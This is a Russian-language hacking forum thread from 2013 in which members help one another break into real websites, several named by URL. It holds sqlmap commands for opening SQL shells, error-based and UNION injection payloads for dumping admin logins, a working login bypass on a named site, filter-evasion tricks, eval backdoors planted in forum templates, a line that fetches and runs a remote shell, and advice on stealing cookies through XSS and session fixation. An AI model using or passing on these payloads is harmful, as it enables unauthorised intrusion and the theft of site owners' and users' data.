Вот у меня возникла такая проблемка, есть сайт с форумом IPB 2.3.5 на сайте есть sql-injection, довольно быстро получил доступ к БД и сразу же начал дампить данные юзеров форума. И тут получился весь облом. Вся соль в том что есть колонка name, email и т.п. а вот password - нету. Вопрос: где админ мог скрыть пароли юзеров и как?

Sat-hacker
05.03.2013, 13:46
Кто может подробнее обьяснить как компилить запускать exploit?Где качать pyton и т.д.Буду очень благодарен.Есть большое количество шелов.Хотелось бы попробовать получить root.

zloy_fantom
05.03.2013, 16:02
Нашел следующие уязвимости в скриптах:

Торрент-трекеры основанные на TBDev 2.0 YSE

1.

Уязвимость позволяет удалённому пользователю сформировать спец. атакующий url адрес и тем самым выполнять произвольный SQL запрос.

./announce.php


$snatch_updateset[] = "completedat = $dt";
$snatch_updateset[] = "uploaded = uploaded + $uploaded2";
$snatch_updateset[] = "downloaded = downloaded + $downloaded2";
$snatch_updateset[] = "to_go = $left";
$snatch_updateset[] = "port = $port";
$snatch_updateset[] = "last_action = $dt";

2.

Уязвимость позволяет удаленному пользователю выполнить произвольный SQL запрос в атакуемой системе.

Уязвимость существует из-за не достаточной проверки входящего параметра code при вводе кода.

Класс данной уязвимости низкий, по причине, того что воспользоваться ей можно если только на сервере стоит error_reporting не ниже E_WARNING.

./bonuscode.php


$res = sql_query("SELECT * FROM bonusgen WHERE pid = '".$s."'");

3.

Не достаточная фильтрация входящих данных дает возможность совершить атаки на файлы rss.php, announce.php, takesignup.php b на другие файлы где используется функция sqlesc(). Это связано с тем что функция sqlesc() экранирует только параметры string. Если же входящие параметры были распознаны как numeric то они не экранируются.

./include/functions.php


function sqlesc($value) {
// Stripslashes
/*if (get_magic_quotes_gpc()) {
$value = stripslashes($value);
}*/
// Quote if not a number or a numeric string
if (!is_numeric($value)) {
$value = "'" . mysql_real_escape_string($value) . "'";
}
return $value;
}

./include/functions_announce.php


function sqlesc($value) {
// Stripslashes
/*if (get_magic_quotes_gpc()) {
$value = stripslashes($value);
}*/
// Quote if not a number or a numeric string
if (!is_numeric($value)) {
$value = "'" . mysql_real_escape_string($value) . "'";
}
return $value;
}

Подскажите, как их можно использовать?

А может кто знает еще типичные уязвимости этого релиза?

Спасибо

Sat-hacker
05.03.2013, 16:03
Скачал актив perl установил денвер.Дайте кто-то ссылку на рабочий exploit для проверки,например в faq.php в Vbulletin. Спасибо.

\/IRUS
05.03.2013, 16:51
2.
Уязвимость позволяет удаленному пользователю выполнить произвольный SQL запрос в атакуемой системе.
Уязвимость существует из-за не достаточной проверки входящего параметра code при вводе кода.
Класс данной уязвимости низкий, по причине, того что воспользоваться ей можно если только на сервере стоит error_reporting не ниже E_WARNING.
./bonuscode.php
Код:
$res = sql_query("SELECT * FROM bonusgen WHERE pid = '".$s."'");


в случае если параметр передается явно в GET запросе и именем s, по условию исключаем Error-Based и Union техники то SQL-shell можно будет вызвать:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php?s=1" --technique="BT" --level=5 --sql-shell

в POST параметре s:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --data="s=1" --technique="BT" --level=5 --sql-shell

в Cookie параметре s:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --cookie="s=1" --technique="BT" --level=5 --sql-shell

в Referer:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --p referer --technique="BT" --level=5 --sql-shell

в User-Agent:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --p user-agent --technique="BT" --level=5 --sql-shell

в любом добавочном хидере:

python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --headers="Accept-Language: fr\nETag: 1%1" --technique="BT" --level=5 --sql-shell

и т.д.

zloy_fantom
05.03.2013, 18:00
\/IRUS

Большое спасибо, буду пробовать

borntobebad
05.03.2013, 19:10
ne kak ne mogu podobrat union+select , vashe ne chego ne xochet ponimat etot sayt , mojet kto nebud xotabi zacepku podkinut

http://www.pixheaven.net/bestof.php?begin=276&entout=12'

ili

http://www.pixheaven.net/photo.php?nom=120906_9930-46'

Unknown
05.03.2013, 21:16
ne kak ne mogu podobrat union+select , vashe ne chego ne xochet ponimat etot sayt , mojet kto nebud xotabi zacepku podkinut
http://www.pixheaven.net/bestof.php?begin=276&entout=12'
ili
http://www.pixheaven.net/photo.php?nom=120906_9930-46'


что-то я тоже не могу вдуплить

просмотрел сайт, вот эти уязвимые к sql-inj параметры:


/bestof.php
begin
entout

/bestof_us.php
begin
entout

/blog.php
begin

/blog_us.php
begin

/livredor_lire.php
begin

/livredor_lire_us.php
begin

/maj.php
begin

/maj_us.php
begin

/photo
nom

/photo.php
nom

/photo_us
nom

/publications_site.php
begin

/publications_site_us.php
begin

/recherche_quoi.php
Afficher
begin
entout

/recherche_quoi_us.php
Afficher
begin
entout

/wallpapers.php
begin
entout

/wallpapers_us.php
begin
entout

но ни один не смог раскрутить...

qaz
05.03.2013, 22:13
ne kak ne mogu podobrat union+select , vashe ne chego ne xochet ponimat etot sayt , mojet kto nebud xotabi zacepku podkinut
http://www.pixheaven.net/bestof.php?begin=276&entout=12'
ili
http://www.pixheaven.net/photo.php?nom=120906_9930-46'


иньекция в лимите, поэтому ничего и не выходит

borntobebad
05.03.2013, 22:17
kokoy progoy ti naskanil eti dannie ? GhostW

borntobebad
05.03.2013, 22:19
qaz , tak tipo ne-kak ne razkrutit ?

\/IRUS
05.03.2013, 23:28
qaz , tak tipo ne-kak ne razkrutit ?


нетс

BigBear
05.03.2013, 23:31
иньекция в лимите, поэтому ничего и не выходит


Инъекция в Лимите прекрасно крутится.

Тут правильнее сказать "инъекция в лимите с использованием в запросе order by".

Чакэ
06.03.2013, 00:24
пацаны, как вы боритесь с ЧПУ?

GET

/page/id/5 - normal

/page/id/6-1 - показывает страницу 5

/page/id/5'


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1


уже понятно что всё довольно таки просто.

НО сраное чпу передаёт плюсы "как есть"


the right syntax to use near ''+and+--+' at line 1


та же хрень с пробелами, они превращаются в %20

/**/ - тоже не катит, этот каким-то образом влияет на само правило ЧПУ и параметры уходят не тому скрипту.

Га-Ноцри
06.03.2013, 00:51
Без ссылки, как ты понимаешь, трудно сказать, но попробуй поиграйся с альтернативами пробела.

%09

%0D

%0A

Ну и не стоит забывать про "безпробельный" вариант запроса, что-то типа:

select(1)from(users)where(id=1)

Чакэ
06.03.2013, 01:35
Без ссылки, как ты понимаешь, трудно сказать, но попробуй поиграйся с альтернативами пробела.
%09
%0D
%0A
Ну и не стоит забывать про "безпробельный" вариант запроса, что-то типа:
select(1)from(users)where(id=1)


игры с %09 etc ни к чему не приводят. запрос получается таким

select * from tbl where id=5%0D

в итоге


Unknown column '0D' in 'where clause'


уязвимый параметр находится не в скобках, а значит "безпробельный" тоже не получится.

XAMEHA
06.03.2013, 10:22
та же хрень с пробелами, они превращаются в %20
/**/ - тоже не катит, этот каким-то образом влияет на само правило ЧПУ и параметры уходят не тому скрипту.


Это ЧПУ, можно попробовать реализовать так, как делается в REQUEST_URI и подобных случаях - В зависимости от сервера, мы напрямую в запросе(БЕЗ БРАУЗЕРА) без кодирования пробуем передать различные символы - (), TAB, %09, + и т.п. и с их кодированием соответственно и смотрим на то, что получается. Если никакие символы не интерпретируются в их аналоги, а всё лишнее кодируется то инъекцию почти всегда провести невозможно, за исключением некоторых простых случаев.

Нужно попробовать использовать различные методы кодирования и определить пропускные символы, интерпретацию мультибайтовых кодировок, какие-то непонятные случаи и дальше исходить от этого.

zloy_fantom
06.03.2013, 11:41
в случае если параметр передается явно в
GET
запросе и именем
s
, по условию исключаем Error-Based и Union техники то SQL-shell можно будет вызвать:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php?s=1" --technique="BT" --level=5 --sql-shell
в
POST
параметре
s
:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --data="s=1" --technique="BT" --level=5 --sql-shell
в
Cookie
параметре
s
:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --cookie="s=1" --technique="BT" --level=5 --sql-shell
в
Referer
:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --p referer --technique="BT" --level=5 --sql-shell
в
User-Agent
:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --p user-agent --technique="BT" --level=5 --sql-shell
в любом добавочном хидере:
python sqlmap.py -u "http://[твой_сайт]/bonuscode.php" --headers="Accept-Language: fr\nETag: 1%1" --technique="BT" --level=5 --sql-shell
и т.д.


Эх, попробовал.....

происходит редирект на login.php, ни auth ни cookie не помогают

ukrpunk
06.03.2013, 14:03
Подскажите..

Вобщем раскрутил скулю, получил логин|пароль, но подозрительно что пароли хранятся в бд без хеширования, т.е. просто пасс лежит. Беру пары логин|пароль, пробую зайти в админку - нифига В чем может быть причина? В бд колонок с логинами\паролями больше нет...

cat1vo
06.03.2013, 14:20
Данные для входа хранятся не в БД, а в файле. Такое часто встречается, смиритесь!

Если есть права у пользователя БД на работу с файлами и известен пусть к сайту, можете попробовать поискать и почитать файлы конфигов!

borntobebad
06.03.2013, 18:30
BigBear . где прочитать на тему раскрутки лимита ? И еше , тут лимит на SELECT нарисовался , его можно обойти ? ели да то где почитать на эту тему ???

BigBear
06.03.2013, 18:37
BigBear . где прочитать на тему раскрутки лимита ? И еше , тут лимит на SELECT нарисовался , его можно обойти ? ели да то где почитать на эту тему ???


Выдержка со RDOT'а

В limit, offset

(в запросе не должен присутствовать order by)

script.php?par=1,111111111 union select version(),2,3,4--

script.php?par=111111111 union select version(),2,3,4--

qaz
07.03.2013, 18:31
сорь, может не в тему но, слили БД сайта, админку найти не могу, в БД таюлици имеют префикс xpanel - в гугле ничего не могу найти про этот двиг, офф сайт уже давно в оффе, может кто что знает про етот двиг? где там админку можно найти?

cat1vo
08.03.2013, 00:09
http://adjump.ru/
пост
logsecurecash=1&login_name=[SQL inj]&login_pass=111111&x=31&y=13
перепробовал различные варианты...никак.


logsecurecash=1&login_name=' or 1#&login_pass=111111&x=31&y=13

Вы зашли как: advaweb

Баланс: 10 руб.

Always
08.03.2013, 00:13
logsecurecash=1&login_name=
' or 1#
&login_pass=111111&x=31&y=13
Вы зашли как:
advaweb
Баланс: 10 руб.


Стыдно, спасибо

BigBear
09.03.2013, 04:35
Mssql
Надо вывести name lastname email
(select top 1 cast(name as nvarchar)+char(0x7a)+cast(email as nvarchar) from member where id=4)--
вывод: name:email@email.com
Как вывести еще lastname в одном запросе , если делаю
(select top 1 cast(name as nvarchar)+char(0x7a)+cast(
lastname
as nvarchar+char(0x7а)+cast(email as nvarchar) from member where id=4)--
Не выводит 3 значение :
name:lastname:email@email.com
Как вывести одним запросом 3 значения?


Потому что скобку забыл в запросе

(select top 1 cast(name as nvarchar)+char(0x7a)+cast(lastname as nvarchar)+char(0x7а)+cast(email as nvarchar) from member where id=4)--

kacergei
09.03.2013, 11:11
Подскажите по поводу FCKeditor 2.5.1 Build 17566

txt файлы спокойно льются, а вот php никак нехочет пробывал:

1) Через /php/upload.php?Type=Media

2) Грузил txt указывал в Current Folder: wso.php%00

3) Пробывал %00 в url-decode, так же пробывал wso2.php%00.txt

Что посоветуете? других дыр нет есть еще CKEditor 3.2.1

Двиг: Powered by cc Engine (китайский двиг)

P.S>.htaccess так же не грузит

GroM88
09.03.2013, 14:34
Подскажите в чем может быть проблема

Сообственно пытаюсь лить шелл через админку phpbb 3 через стили

Включаю выполнение php кода в шаблонах, иду в шаблоны faq_body.html

впиливаю код

Иду в forum.com/faq.php?c=phpinfo(); пхпинфо не выводится = \

Подскажите почему может не выполнятся пхпкод

права в админке полные, мб можно еще какнить залить?

panfilov1991
09.03.2013, 14:39
Что за бред, думать надо хоть не много головой, инъекция в куках, а Вы хотите их отключить? Тут дело в другом, человек совершенно не умеет этим всем пользоваться и работать с тем, что нашел ему сканер, да и по всей видимости, сам не понимает, что хочет.
Все отлично работает, запрос переделал, мне так удобнее...

Host: game.*****.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
Cookie: login=demodemo; pass="or(1)group+by(mid((select+concat_ws(0x3a,version() ,schema())),rand(0)|0))having(avg(0))or"

Duplicate entry '
5.5.29-1-log:s10parl
' for key 'group_key'
Версия -
5.5.29-1-log
Названия Базы Данных -
s10parl
"or(1)group+by(mid((
СЮДА ВСТАВЛЯЙТЕ СВОЙ ЗАПРОС
),rand(0)|0))having(avg(0))or"
Дальше делайте сами, если не знаете как, на форуме есть мануал -
ССЫЛКА (https://antichat.live/threads/43966/)
З.Ы. Для работы можете пользоваться тем же Acunetix, Burp Suite, Firefox (Live HTTP Headers) или HTTPAnalyzer (я предпочитаю его)!


пытаюсь отправить запросы для вывода данных хотя бы юзеров.

то и дело выходят ошибки :


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' at line 1




Table 'panel.users' doesn't exist




Table 'panel.***' doesn't exist


Подскажите где взять список запросов?

winstrool
09.03.2013, 15:13
пытаюсь отправить запросы для вывода данных хотя бы юзеров.
то и дело выходят ошибки :
Подскажите где взять список запросов?


а какой запрос вы делайте? покажите.

panfilov1991
09.03.2013, 15:29
а какой запрос вы делайте? покажите.




"or(1)group+by(mid((SELECT * FROM users WHERE login='Admin' AND pass='123' OR login='Admin' --''),rand(0)|0))having(avg(0))or"


ошибка :


Table 'panel.users' doesn't exist



Как можно вывести названия таблиц?

Очень надо вывести логин и пасс админа

winstrool
09.03.2013, 15:44
ошибка :
Как можно вывести названия таблиц?
Очень надо вывести логин и пасс админа




"or(1)group+by(mid((SELECT concat_ws(0x3a,login,pass) FROM users WHERE login=0x41646D696E limit 0,1),rand(0)|0))having(avg(0))or"


там где значение 0x41646D696E это Admin, вам бы мануалы по mysql почитать!

panfilov1991
09.03.2013, 16:05
там где значение 0x41646D696E это Admin, вам бы мануалы по mysql почитать!


Мне реально стыдно! я уже их перечитался!

мне бы пароль админа содрать, или таблицы вывести с БД

qaz
09.03.2013, 16:57
Подскажите в чем может быть проблема
Сообственно пытаюсь лить шелл через админку phpbb 3 через стили
Включаю выполнение php кода в шаблонах, иду в шаблоны faq_body.html
впиливаю код
Иду в forum.com/faq.php?c=phpinfo(); пхпинфо не выводится = \
Подскажите почему может не выполнятся пхпкод
права в админке полные, мб можно еще какнить залить?


так вставляй


phpinfo();



Мне реально стыдно! я уже их перечитался!
мне бы пароль админа содрать, или таблицы вывести с БД



так а в чём собственно проблема?

GroM88
09.03.2013, 17:12
так вставляй

phpinfo();



ни какого эффекта) ничего не выводит = \

я уже пробовал так)

KolosJey
10.03.2013, 00:49
"or(1)group+by(mid((SELECT concat_ws(0x3a,login,pass) FROM users WHERE login=0x41646D696E limit 0,1),rand(0)|0))having(avg(0))or"
там где значение 0x41646D696E это Admin, вам бы мануалы по mysql почитать!


Тебе бы тоже хоть что нибудь почитать, вместо того что бы советы давать.


Table 'panel.users' doesn't exist

m00c0w
10.03.2013, 01:14
Тебе бы тоже хоть что нибудь почитать, вместо того что бы советы давать.


он ему запрос дал и посоветовал мускуль подучить, чтоб он сам смог вывести таблицы, а ты тупо "умничаешь."

Always
10.03.2013, 01:50
Делаю такой запрос

1+UnIon+selECt+1,2,3,4,5,6,version(),8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42&x=-392&y=-378 true

1+UnIon+selECt+1,2,3,4,5,6,group_concat(table_name ),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42+from+INFORMATION_SCHEMA.TABLES+--+&x=-392&y=-378 false

Выдает

Illegal mix of collations for operation 'UNION'

Как быть?

Га-Ноцри
10.03.2013, 03:09
Делаю такой запрос
1+UnIon+selECt+1,2,3,4,5,6,version(),8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42&x=-392&y=-378 true
1+UnIon+selECt+1,2,3,4,5,6,group_concat(table_name ),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42+from+INFORMATION_SCHEMA.TABLES+--+&x=-392&y=-378 false
Выдает
Illegal mix of collations for operation 'UNION'
Как быть?


Если не ошибаюсь, то такая ошибка обычно связана с проблемами в кодировке. И, судя по всему, в ошибке в вашем случае явно не указана нужная. Если ошибаюсь то меня поправят.

Немного пищи для размышления:

cast(version()+as+binary)

convert(version(),binary)

convert(version()+using+latin1)

convert(version()+using+binary)

aes_decrypt(aes_encrypt(version(),1),1)

unhex(hex(version()))

Попробуйте при выводе нужной информации использовать приведенные выше примеры.

HeaVeNSeR
10.03.2013, 03:50
ребят,хелп ми,плз

есть уязвимость 'PHP Code execution'...выполняются phpinfo(),system(ls) и т.д.....слэшируются кавычки,хотя MQ=Off...всё бы ничего,можно было бы обойти c помощью base64,либо system($_GET[a])...но режутся заглавные....

что можно сделать в данном случае?

Konqi
10.03.2013, 04:51
ребят,хелп ми,плз
есть уязвимость 'PHP Code execution'...выполняются phpinfo(),system(ls) и т.д.....слэшируются кавычки,хотя MQ=Off...всё бы ничего,можно было бы обойти c помощью base64,либо system($_GET[a])...но режутся заглавные....
что можно сделать в данном случае?


print(`я консольная команда`);

HeaVeNSeR
10.03.2013, 05:00
print(`я консольная команда`);


не совсем понял...)

как,к примеру,вывести результат system('ls -la')? (экранируются кавычки и режутся заглавные)

WendM
10.03.2013, 07:48
не совсем понял...)
как,к примеру,вывести результат system('ls -la')?
(экранируются кавычки и режутся заглавные)


Такая кавычка тоже режится ?


`


Как насчет


%27


или


%60


?

HeaVeNSeR
10.03.2013, 19:50
Такая кавычка тоже режится ?
Как насчет или ?


такая кавычка не режется, print(`ls -la`) сработало...но теперь похоже режутся слэши...ни ls ../,ни ls ..\ не срабатывает...соотв-но,залиться тоже не получается...

есть ещё варианты?

Zahar
11.03.2013, 02:10
help

Парни, хелп!


_ttp://www.infotopcar.com/index.php?option=com_parcoauto&action=scheda&idVeicolo=-3473%20UNION%20ALL%20SELECT%200,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,CONCAT%280x7e,version%28%29,0x7e%29,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0--%20&tipo=auto

Не получается продвинуть далее.

cat1vo
11.03.2013, 06:34
Парни, хелп!

_ttp://www.infotopcar.com/index.php?option=com_parcoauto&action=scheda&idVeicolo=-3473%20UNION%20ALL%20SELECT%200,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,CONCAT%280x7e,version%28%29,0x7e%29,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0--%20&tipo=auto

Не получается продвинуть далее.




www.infotopcar.com/index.php?option=com_parcoauto&action=scheda&idVeicolo=-3473 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,t able_name,38,39,40,41,42,43,44,45,46,47,48,49,50,5 1,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67, 68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84 ,85, 86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101, 103,104,105,106,107,108,109,110,111,112,113,114,11 5,116,117,118,119,120,121,122,123,124,125,126,127, 128,129,130,131,132,133,134,135,136,137,138,139,14 0,141,142,143,144,145,146,147,148,149,150,151,152, 153,154,155,156+from+information_schema.tables+whe re+table_schema=0x706f7274616c636c7562+limit+0,1--+-&tipo=auto

Boombilka
11.03.2013, 16:24
Есть булковский форум, прописал в faq_complite eval($_GET[e]);.

Вроде бы все хорошо, пхп инфо выводиться, но вот только:


allow_url_include Off
allow_url_fopen Off

Интересует, как заливаться в данной непростой ситуации? До этого пробывал вгетом лить в tmp, вроде бы все залилось, только вот site.com/tmp/shell.php не открывается, и выдает 404 ошибку. И да, на всех папках стоят права nobody(мб это как-то влияет?).

Заранее спасибо

qaz
11.03.2013, 16:45
Есть булковский форум, прописал в faq_complite eval($_GET[e]);.
Вроде бы все хорошо, пхп инфо выводиться, но вот только:

allow_url_include Off
allow_url_fopen Off

Интересует, как заливаться в данной непростой ситуации? До этого пробывал вгетом лить в tmp, вроде бы все залилось, только вот site.com/tmp/shell.php не открывается, и выдает 404 ошибку. И да, на всех папках стоят права nobody(мб это как-то влияет?).
Заранее спасибо


пропиши eval(base64_decode($_GET[e]));

и юзай курл

exstreme
11.03.2013, 19:59
Привет всем!

Помогите пожалуйста разобраться с XSS-уязвимостями. Не совсем понятно, как использовать их, чтобы к примеру получить чужие cookies, а не свои.

Что делать с такого вида уязвимостями?


URL encoded POST input poll%5Btitle%5D was set to '"()&%1prompt(911011)

или


URL encoded POST input character%5bdescription%5d was set to 1
The input is reflected inside a text element.

Также интересует уязвимости типа "HTML form without CSRF protection" можно использовать для подмены данных или не только?

GroM88
11.03.2013, 20:25
Сообственно впервые столкнулся с такой проблемой)

Вообщем через скуль добыл пасс от рута мускула , на сайте есть phpmyadmin

Сообственно пытался залить шелл через пхпмуадмин и столкнулся с такой проблемой

а именно с определение пути к сайту

например мой сайт называется sqlinject.com

sqlinject.com/news.php?id=1'

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/vhost/sql.com/news.php on line 63

так же в корне присувствует файл phpinfo в котором путь так же прописан таким образом /var/www/vhost/sql.com/phpinfo.php

Решил посмотреть сайты на одном ип в итоге получил список из 50+ сайтов... попробовал просканить эти сайты на директории и файлы оказалось что в каждом сайте присувствуют такие файлы config.php, connect.php, phpinfo.php и еще куча файлов. вообщем файлы одни и теже на каждом сайте... это я клоню к тому что файлы эти посути лежат в одной директории, но контент на сайтах разный совершенно...

в файле phpinfo.php на каждом сайте один и тот же путь) "/var/www/vhost/sql.com/phpinfo.php"

Пробовал прочитать файл через LOAD_FILE например phpinfo с пути написанного выше) не читает... хотя /etc/passwd читает)

Чисто для читалки попробовал залить минишелл через пхпмуадмин в /tmp/

Шелл залился и прочитался через LOAD_FILE

Сообственно интересует вопрос возможно ли как-то получить настоящий путь к сайту sqlinject.com, что бы залится)

Мб есть у кого какие нить соображения по этому поводу?)

Есть папочка icons от апача) но она походу не доступна для записи) да и путь искать надо)

Если есть у кого желание помочь и поломать голову)) могу предоставить root;pass к phpmyadmin ))

jestkokos
12.03.2013, 05:53
http://bkwar.ru/news/?topic=494 Протестил через Хавиж (ну первонюбские примычки) Скюля методом стринг. Хавиж выводит Бд всё нормально таблицы и так далее...

Ихнее http://bkwar.ru/www/labirint3/ulldie.php Пхпинфо

ИСП мэнэджер тут https://bkwar.ru:1500/

Ещё БД тут http://bkwar.ru/pgadmin/

Открытые порты сканеные через нмап : 110 , 143, 1500 , 21 ,22 , 443 , 4444 ,5000 ,53 , 993 ,995 ну и соотвественно 80.

Что нашёл webshag Напишу более подозрительные

/robots.txt found. It might be interesting to have a look inside.

/bin/ Directory indexing is enabled: CGI directory

/bin/ This might be interesting... possibly a system shell found.

/webmail/src/read_body.php This might be interesting... has been seen in web logs from an unknown scanner.

Ну есть ещё уйма директорий ...

А да сканер Дирбустер показал это : http://bkwar.ru/myadmin/setup/index.php

Пробовал разные варианты прочитанные и не прочитанные. А у них отключенно выползание ерророк (тут и ступор).

Недельки две мучаюсь. может подскажите как как всё это преодолеть и вынести результат в браузер.

Прошу прощение если не туда всунул вопрос. Ещё не освоился у вас...

er9j6@
12.03.2013, 14:36
нужно вывести username,password при помощи sqlmap, где usertype=Administrator

http://blindcanadians.ca/press_releases/index.php?BriefID=50+union+select+concat_ws(0x3a,u sername,password)+from+users+where+usertype='Admin istratot'+--+

так дампится вся база, как сделать так, чтобы выводился только Administrator?

sqlmap -u "http://blindcanadians.ca/press_releases/index.php?BriefID=50" --dump -T users -v 1

qaz
12.03.2013, 18:53
я тут с такой поблемой столкнулся, залил на сайт шелл, отредактировал морду, открываю сам сайт, изменений ноль, смотр на Server IP: там написано 127.0.0.1 что ет за фигня такая?

OxoTnik
12.03.2013, 19:11
я тут с такой поблемой столкнулся, залил на сайт шелл, отредактировал морду, открываю сам сайт, изменений ноль, смотр на Server IP: там написано 127.0.0.1 что ет за фигня такая?


посмотри с другово браузера этот же сайт, или просто очисти кеш

qaz
12.03.2013, 19:36
посмотри с другово браузера этот же сайт, или просто очисти кеш


та это тут не причём, индекс действительно не изменился, вот если удалить файл то да, напишет ошибку, а от изменений ноль толку

Cennarios
12.03.2013, 23:26
И чего удивительного? Наверняка какой нибудь APC cache или что-то из этой оперы стоит. При изменении кеш просто не успевает обновиться, а при удалении файловый идентификатор из ФС исчезает и в opcode кешер вносится соответствующая информация. Посмотри что используется в phpinfo и если тот же APC то у него есть менеджер одним файлом в котором удобно обнулять кеш.

По поводу IP учите матбазу господа. В стандартной связке nginx+apache, к примеру, фронтэнд вешается на внешний интерфейс имеющий уникальный IP, в то время как бэкэнд вешается на локальный те localhost он же 127.0.0.1. А так как php выполняется на уровне бэкэнда будь то mod_php или cgi, то и переменная окружения которая выводится в serverIP имеет оный localhost

qaz
12.03.2013, 23:52
И чего удивительного? Наверняка какой нибудь APC cache или что-то из этой оперы стоит. При изменении кеш просто не успевает обновиться, а при удалении файловый идентификатор из ФС исчезает и в opcode кешер вносится соответствующая информация. Посмотри что используется в phpinfo и если тот же APC то у него есть менеджер одним файлом в котором удобно обнулять кеш.
По поводу IP учите матбазу господа. В стандартной связке nginx+apache, к примеру, фронтэнд вешается на внешний интерфейс имеющий уникальный IP, в то время как бэкэнд вешается на локальный те localhost он же 127.0.0.1. А так как php выполняется на уровне бэкэнда будь то mod_php или cgi, то и переменная окружения которая выводится в serverIP имеет оный localhost



чего ты так рагорячился)) мы же не такие про как ты))

глянул пхп инфо, есть там apc, как там обнулить кеш?

Cennarios
13.03.2013, 00:23
погугли - apc.php manager по самому первому линку там можно скачать скрипт. Очень просто настраивается. В правом верхнем углу кнопка - clear opcode cache. Меняешь php файл. Обнуляешь кеш, заново инициируешь запуск файла в который были внесены изменения. Стоит отметить, что далее в frontend-backend данные от бэкенда попадают в тот же файловый кеш нгинкса или мемкеш. Так что если все равно не обновится значит копать в эту сторону.

Groove
13.03.2013, 00:39
Как пользоваться PHPSESSID session fixation дайте ссылку на топ

XAMEHA
13.03.2013, 03:02
Как пользоваться
PHPSESSID session fixation
дайте ссылку на топ


Возможный путь использования XSS:


-Нахождение XSS

-Впаривание XSS

-Получение PHPSESSID

-Заход под PHPSESSID



PHPSESSID session fixation:


-Создание своего уже-известного PHPSESSID

-Установка этого PHPSESSID у у аленого человека(Впариван ие)

-Он авторизуется по этим PH PSESSID

-Мы заходим под уже извест ным PHPSESSID



Может использоваться как альтернатива кражи куков в некоторых случаях, при впаривани методом соц. инженерии, при отправке скомпрометированного ответа сервером.

Установка PHPSESSID может быть в параметрах методом GET, а не только через куки.

http://www.acros.si/papers/session_fixation.pdf

panfilov1991
13.03.2013, 13:41
отправляю запрос на сервер


"or(1)group+by(mid((SELECT concat_ws(0x3a,login,pass) FROM users WHERE login=0x41646D696E limit 0,1),rand(0)|0))having(avg(0))or"


Выдает :


Table 'panel.users' doesn't exist


Сайт


http://game.parlahost.ru/

panfilov1991
13.03.2013, 20:38
отправляю запрос на сервер
Выдает :
Сайт


Нужно вывести лог и пасс админа

Cherep
14.03.2013, 17:16
Есть шелл(с нормальным PR), но на этом шелле хостятся еще приличное кол-во нулевиков, папки открыты(с нулевика можно спокойно залится на сайт с норм PR), возник вопрос:

можно ли какнить изменить права на доступ с этих нулевиков в другие папки?

winstrool
14.03.2013, 18:36
Есть шелл(с нормальным PR), но на этом шелле хостятся еще приличное кол-во нулевиков, папки открыты(с нулевика можно спокойно залится на сайт с норм PR), возник вопрос:
можно ли какнить изменить права на доступ с этих нулевиков в другие папки?


Можно, если в заливаемой папке полные права или принадлежат одной группе!

rogatiy
14.03.2013, 18:44
Имеется у нас сайт N, а на этом сайте уязвимость /search/?name=, пропускающая PHP-инъекции, то есть запрос /search/?name={${phpinfo()}} выводит phpinfo. В результате бурного гугления пришёл к такому инжекту: name={${eval(stripslashes($_GET[cmd]))}}&cmd=eval(file_get_contents('шелл'));.

И вроде бы, лепота, да прав нет, словно у негра в XX веке в США(исторический факт, расизм - нихарашо). С copy(), как и с file_put_contents() разобраться не могу, хотя сам понимаю, что это вроде бы элементарно. Поэтому и прошу совета. Заранее благодарен!

попугай
15.03.2013, 02:14
